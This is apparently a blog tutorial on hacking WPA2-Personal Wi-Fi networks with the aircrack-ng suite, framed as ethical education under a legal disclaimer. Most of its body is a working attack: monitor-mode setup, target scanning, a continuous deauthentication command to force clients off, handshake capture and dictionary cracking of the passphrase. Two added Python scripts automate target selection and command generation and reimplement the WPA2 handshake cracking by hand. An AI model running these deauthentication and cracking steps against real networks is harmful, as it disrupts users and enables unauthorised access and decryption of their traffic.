The Art of Wi-Fi Hacking: An Ethical Guide for Education and Research

toto001
5 min read, Apr 2, 2023


Disclaimer

We want to be absolutely clear on this point. As much fun as it might seem to hack into your neighbor’s wireless network or a secured network at a friend’s house, hotel, or other location, don’t do it. You need to have permission from the network owner if you are to do any kind of hacking or penetration testing on their systems.

It might not seem like a big deal, but accessing a system without permission can carry extremely steep legal penalties, including jail time, depending on your location.

To attack a wireless network, you need a wireless adapter with two capabilities:

  1. It must support monitor mode, so it can capture every 802.11 frame on a channel rather than only the frames addressed to it.
  2. It must support packet injection, so it can transmit raw frames, such as the deauthentication frames used later in this guide.

We have bad news for you. Many onboard cards can enter monitor mode under Linux, but injection support depends on the driver, and if you run Kali in a virtual machine the host's built-in Wi-Fi card is not visible to the guest at all (the VM sees a virtual Ethernet NIC). In practice you will need an external USB adapter with a chipset whose Linux driver supports both features, and you pass that USB device through to the VM.


Set Up Kali

If you don’t have Kali Linux installed, see our article How To Install Kali Linux on VirtualBox.

Let’s Start Hacking

We’re now going to go through the step-by-step process of hacking a WPA2-Personal WiFi network.

There are several programs we can use, but this article will only focus on using the Aircrack-NG suite of tools. We encourage you to try some of the other tools mentioned in the Frequently Asked Questions.

Monitor Mode

A network card normally hands the operating system only frames addressed to its own MAC address (plus broadcast and multicast). Monitor mode tells the card to pass up every 802.11 frame it hears on the current channel, including management frames such as beacons and deauthentications and the EAPOL handshake we want, without being associated with any network. It is often confused with promiscuous mode, which is weaker: promiscuous mode only reveals other stations' data frames on a network the card has already joined.

Let’s switch to root using the command sudo su. You will be prompted for your Kali password.

Use ifconfig (or ip link) to find the name of the wireless interface. Below, it is wlan0.

Using iwconfig we see the adapter is currently in managed mode (not monitor).

We will use Airmon-NG to put the adapter into monitor mode.

First, we stop the processes that would interfere (NetworkManager and wpa_supplicant, which keep grabbing the interface). This drops the machine's normal Wi-Fi connection until you start them again, for example with systemctl start NetworkManager. The command is

airmon-ng check kill

Then change the adapter’s mode using

airmon-ng start wlan0

Use your own adapter name if it differs. With most drivers airmon-ng renames the interface by adding "mon" (for monitor) to the end, so in our case wlan0 became wlan0mon. Run iwconfig again and confirm the new interface reports Mode:Monitor; a few drivers keep the original name, and airmon-ng prints whichever name it ended up with.

Scanning For Networks

Now that we are in monitor mode, we can begin scanning. We will use the program Airodump-NG, which takes the monitor interface as its last argument (in our case wlan0mon) rather than through a flag. By default it hops across the 2.4 GHz channels and lists every access point and client it hears; add --band abg to include 5 GHz.

airodump-ng wlan0mon

We are picking up all kinds of traffic. Let’s examine what we see.

  • BSSID is the MAC address of each access point we can see.
  • CH is the channel it is running on. Channels 1, 6, and 11 are common because they are the three non-overlapping 2.4 GHz channels; this has nothing to do with WPA2.
  • ENC is the encryption: OPN for an open network, or WEP, WPA, WPA2, or WPA3. The CIPHER column next to it shows the cipher suite (CCMP or TKIP).
  • AUTH is the authentication method. PSK stands for pre-shared key (WPA2-Personal, the target of this guide); MGT means 802.1X/enterprise authentication, where there is no shared password to crack.
  • ESSID is the human-readable name of the wireless network. Hidden networks show up as <length: N> until a client reveals the name. We can see our target network, along with its BSSID and channel.
  • STATION, in the lower table, lists the MAC addresses of client devices. The BSSID column beside each station shows which access point it is associated with, or "(not associated)" for devices that are only probing.
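Picking the target from this listing is a judgement call on the screen, but airodump-ng also writes the same tables to a CSV file when you use --write, and a short script can do the selection: only a WPA/WPA2-PSK access point with at least one associated client is worth capturing against. The following is an added example, not code from the original article; the CSV text inside it is a constructed sample in airodump-ng's layout (every MAC, timestamp and name is made up), so it runs without a capture, and the generated commands assume the interface name wlan0mon and the prefix HackDump used later in this guide.

```python
"""Pick a handshake-capture target from airodump-ng's CSV output.

Added example, not code from the original article. Besides the .cap, airodump-ng
--write <prefix> writes <prefix>-01.csv with two comma-separated tables, access
points and then stations, holding the same columns the live screen shows. The
text below is a constructed sample in that layout (every MAC, time and name is
made up), so the script runs without a capture.
"""
import csv
import io
import re

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
EC:AD:E0:AB:93:34, 2023-04-02 12:00:01, 2023-04-02 12:04:59,  1,  54, WPA2, CCMP, PSK, -41,      312,      108,   0.  0.  0.  0,   9, HackMeNet,
11:22:33:44:55:66, 2023-04-02 12:00:03, 2023-04-02 12:04:58,  6, 130, WPA2, CCMP, PSK, -67,      200,        0,   0.  0.  0.  0,   6, Coffee,
22:33:44:55:66:77, 2023-04-02 12:00:04, 2023-04-02 12:04:57, 11, 130, WPA2, CCMP, MGT, -70,      180,        0,   0.  0.  0.  0,   7, CorpNet,
AA:BB:CC:DD:EE:01, 2023-04-02 12:00:05, 2023-04-02 12:04:50, 11,  54, OPN,     ,    , -72,      150,        0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
F2:98:11:22:33:44, 2023-04-02 12:00:10, 2023-04-02 12:04:59, -50,       96, EC:AD:E0:AB:93:34, HackMeNet
F2:98:55:66:77:88, 2023-04-02 12:02:10, 2023-04-02 12:04:40, -55,       12, EC:AD:E0:AB:93:34,
DE:AD:BE:EF:00:01, 2023-04-02 12:01:00, 2023-04-02 12:04:30, -80,        4, (not associated), Coffee,Airport
"""


def _table(section: str) -> list:
    # One comma-separated table: the first non-empty row is the header. Fields are
    # padded with spaces in the file, so strip each one.
    rows = [[f.strip() for f in r]
            for r in csv.reader(io.StringIO(section), skipinitialspace=True)]
    rows = [r for r in rows if any(r)]
    header, out = rows[0], []
    for r in rows[1:]:
        row = dict(zip(header, r))
        row[header[-1]] = ",".join(r[len(header) - 1:])   # probed ESSIDs may contain commas
        out.append(row)
    return out


def parse_airodump_csv(text: str):
    # Two tables separated by a blank line (airodump also leaves one at the top of the file).
    sections = re.split(r"\n\s*\n", text.strip())
    aps = {r["BSSID"]: r for r in _table(sections[0])}
    stations = _table(sections[1]) if len(sections) > 1 else []
    return aps, stations


def handshake_targets(aps: dict, stations: list) -> list:
    # A deauth-and-capture only works against a WPA/WPA2-PSK AP that currently has an
    # associated client, so filter on exactly that and rank by number of clients.
    clients = {}
    for st in stations:
        if not st["BSSID"].startswith("(not associated"):
            clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    targets = []
    for bssid, ap in aps.items():
        if "WPA" in ap["Privacy"] and ap["Authentication"] == "PSK" and bssid in clients:
            targets.append({"bssid": bssid, "channel": int(ap["channel"]),
                            "essid": ap["ESSID"], "clients": clients[bssid]})
    return sorted(targets, key=lambda t: len(t["clients"]), reverse=True)


def capture_commands(target: dict, iface: str = "wlan0mon", prefix: str = "HackDump") -> list:
    # The capture and deauth commands from this guide, filled in from the chosen target
    # (a few deauth bursts per client rather than 0, which would run until stopped).
    cmds = [f"airodump-ng --channel {target['channel']} --bssid {target['bssid']} "
            f"--write {prefix} {iface}"]
    cmds += [f"aireplay-ng --deauth 5 -a {target['bssid']} -c {c} {iface}"
             for c in target["clients"]]
    return cmds


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for t in handshake_targets(aps, stations):
        print(t["essid"], t["bssid"], "ch", t["channel"], "clients", t["clients"])
        print("\n".join(capture_commands(t)))
```

Run it against a real file with parse_airodump_csv(open("HackDump-01.csv").read()). The open "Guest" network and the enterprise "CorpNet" network are filtered out on purpose: there is no pre-shared key to recover on either, and the probing-only station is ignored because a deauth needs a client that is actually associated.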

Capturing Traffic

Now that we know our target's BSSID, let's capture only the frames belonging to it and save them to a capture file. We will use Airodump-NG again, with the --channel flag (short form -c) to lock the adapter on the target's channel instead of hopping, the --bssid flag (-b) to filter on the access point, and --write (-w) to set the file name prefix.

airodump-ng --channel 1 --bssid EC:AD:E0:AB:93:34 --write HackDump wlan0mon

A capture file is now being written. In the lower table we can see one station associated with the target (the phone we connected to this access point; connect a device if you haven't already).

What we want to capture is the WPA2 four-way handshake, the EAPOL-Key exchange a client performs whenever it joins or rejoins the network. The handshake does not contain the password, but it contains the two nonces and a MIC computed with a key derived from the password, which is enough to test guesses offline. Rather than waiting for a client to connect on its own, we run a deauthentication attack against a connected device: it is kicked off the network, reconnects automatically, and we capture the handshake. One caveat: if the network enforces Protected Management Frames (802.11w, optional in WPA2 and mandatory in WPA3), clients ignore forged deauthentication frames and this trick fails; you then have to wait for a client to connect naturally.

In a new terminal, we will run Aireplay-NG with the following flags

--deauth <num> sets the number of deauthentication bursts to send (we will use zero, which means keep attacking until we stop it)

-a <BSSID> is the access point to impersonate
-c <STATION> is the client to kick (omit it and the deauthentication is broadcast to every client of that access point)
And then list the interface

aireplay-ng --deauth 0 -a EC:AD:E0:AB:93:34 -c F2:98:XX:XX:XX:XX wlan0mon

Let it run for a short while, then press Ctrl+C to stop the attack. Airodump-NG prints "WPA handshake: <BSSID>" in its top line once it has the handshake; in our run that took roughly 10 seconds. You can now stop the packet capture in the other terminal window as well, again with Ctrl+C.

You can see all the files that were saved: a .cap file plus CSV and Kismet-format summaries with the same prefix. The *.cap file holds the raw frames and is the one we need.

Cracking the Password

We will use the program aircrack-ng to run a dictionary attack against the captured handshake and try to recover the passphrase. We are using the fern-wifi common password list that ships with Kali under /usr/share/wordlists/fern-wifi/.

The command is (add -b <BSSID> if the capture holds handshakes for more than one network):

aircrack-ng HackDump-01.cap -w /usr/share/wordlists/fern-wifi/common.txt

The cracking attempts begin. We put the password in this list deliberately, so in under one second Aircrack-NG tried about 400 passwords and found the correct one, and we now have the key to this network. Two things to keep in mind. The attack is only as good as the wordlist: each guess costs 4096 iterations of PBKDF2-HMAC-SHA1, so even a high-end GPU manages only a few million guesses per second, and a long random passphrase is out of reach. And the recovered key does more than grant access: together with a captured handshake it lets you decrypt that client's traffic in the capture (airdecap-ng does this), which is why a leaked Wi-Fi password is worth rotating.
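To make concrete what aircrack-ng is doing with the handshake described in the Capturing Traffic section and cracked here, the following added example (not code from the original article and not aircrack-ng's own) works the attack out by hand: it derives the PMK from a passphrase with PBKDF2, derives the PTK and its KCK from the two MACs and two nonces, computes the MIC of EAPOL-Key message 2, and then recovers the passphrase by recomputing that MIC for each candidate in a wordlist. Nothing is read from a capture; the SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the example, and the handshake is produced by simulating the access point and client sides with the same functions.

```python
"""WPA2-PSK dictionary attack, written out by hand to show what aircrack-ng
does with the handshake in HackDump-01.cap.

Added example, not the article's own code and not aircrack-ng's. Nothing is
read from a capture file: the AP and client roles below are simulated to
produce a genuine EAPOL-Key message 2 for a known passphrase, and the attacker
role then recovers that passphrase from a small constructed wordlist.
SSID, MACs, nonces, passphrase and wordlist are all made up for this example.
"""
import hashlib
import hmac
from typing import Optional

# ---- key derivation as in IEEE 802.11 (WPA2-Personal, CCMP) -------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # These 4096 iterations are the whole cost of one guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range((nbytes + 19) // 20))
    return out[:nbytes]

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    # PTK (48 bytes for CCMP) = KCK(16) || KEK(16) || TK(16). Inputs are sorted so
    # both sides, and an eavesdropper, build the same byte string.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)

# ---- EAPOL-Key frame (RSN key descriptor) ---------------------------------------

MIC_OFFSET, MIC_LEN = 81, 16   # 4-byte EAPOL header + 77 descriptor bytes precede the MIC

def build_eapol_key_msg2(snonce: bytes, replay_counter: int, rsn_ie: bytes) -> bytes:
    # Message 2 (client -> AP) with the MIC field zeroed. key_info 0x010a = descriptor
    # version 2 (HMAC-SHA1-128 MIC), pairwise key, MIC bit set.
    body = (b"\x02" + (0x010a).to_bytes(2, "big") + (0).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce + bytes(16) + bytes(8)
            + bytes(8) + bytes(MIC_LEN) + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type 3 = EAPOL-Key

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # Version-2 MIC: HMAC-SHA1 over the whole EAPOL frame with a zeroed MIC field, cut to 16 bytes.
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]

# ---- constructed handshake (victim side) ------------------------------------------

SSID = "HackMeNet"                               # fictional
AP_MAC = bytes.fromhex("ecade0ab9334")           # fictional, same value as the BSSID above
STA_MAC = bytes.fromhex("f298a1b2c3d4")          # fictional client
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # WPA2 / CCMP / PSK
REAL_PASSPHRASE = "sunshine1"

def forge_handshake(passphrase: str, seed: int = 7) -> dict:
    # Everything a sniffer sees: AP MAC, client MAC, ANonce (from message 1), SNonce and
    # the MIC-bearing message 2. Nonces are deterministic here only for repeatability.
    anonce = hashlib.sha256(b"anonce" + bytes([seed])).digest()
    snonce = hashlib.sha256(b"snonce" + bytes([seed])).digest()
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    frame = build_eapol_key_msg2(snonce, 1, RSN_IE)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": frame}

# ---- attacker side --------------------------------------------------------------------

def crack_psk(handshake: dict, wordlist) -> Optional[str]:
    # Every input to the MIC except the PMK is public, so each candidate passphrase
    # is checked by recomputing the MIC of message 2 and comparing.
    observed = handshake["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:      # WPA passphrase length limits; skip for free
            continue
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol_msg2"]), observed):
            return candidate
    return None

WORDLIST = ["password", "12345678", "letmein!", "sunshine1", "qwertyuiop"]   # constructed

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(forge_handshake(REAL_PASSPHRASE), WORDLIST))
```

Two details carry over to the real tool. Only message 2 (or message 3) with its matching nonce pair is strictly needed, which is why a partial handshake is often enough, and the SSID is part of the PBKDF2 salt, so a rainbow table built for one network name is useless against another. This example covers the WPA2 case (descriptor version 2); original WPA with TKIP uses descriptor version 1, whose MIC is HMAC-MD5, and aircrack-ng handles both.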


toto001

Hello, I'm TOTO001. I started in cybersecurity in 2019 and decided to start programming within 4 months. I also try bug bounty. I will share my experience here.